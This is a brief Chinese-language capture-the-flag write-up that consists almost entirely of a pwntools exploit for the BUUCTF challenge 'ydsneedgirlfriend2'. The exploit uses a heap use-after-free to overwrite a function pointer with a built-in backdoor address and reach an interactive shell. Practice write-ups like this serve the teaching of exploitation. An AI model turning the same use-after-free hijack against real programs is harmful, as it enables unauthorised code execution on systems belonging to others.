有符號表,而且直接留了後門!
exp
from pwn import *
context(log_level='debug')
def debug_pause():
log.info(proc.pidof(p))
pause()
def add(length, name):
p.sendlineafter('choice :', str(1))
p.sendlineafter('the length of her name:', str(length))
p.sendafter('her name:', name)
def dele(index):
p.sendlineafter('choice :', str(2))
p.sendlineafter('Index :', str(index))
def show(index):
p.sendlineafter('choice :', str(3))
p.sendlineafter('Index :', str(index))
proc_name = './ydsneedgirlfriend2'
p = process(proc_name)
# p = remote('node3.buuoj.cn', 25351)
elf = ELF(proc_name)
backdoor_addr = 0x400d86
add(0x80, b'a')
dele(0)
add(0x10, p64(0x0) + p64(backdoor_addr))
# debug_pause()
show(0)
p.interactive()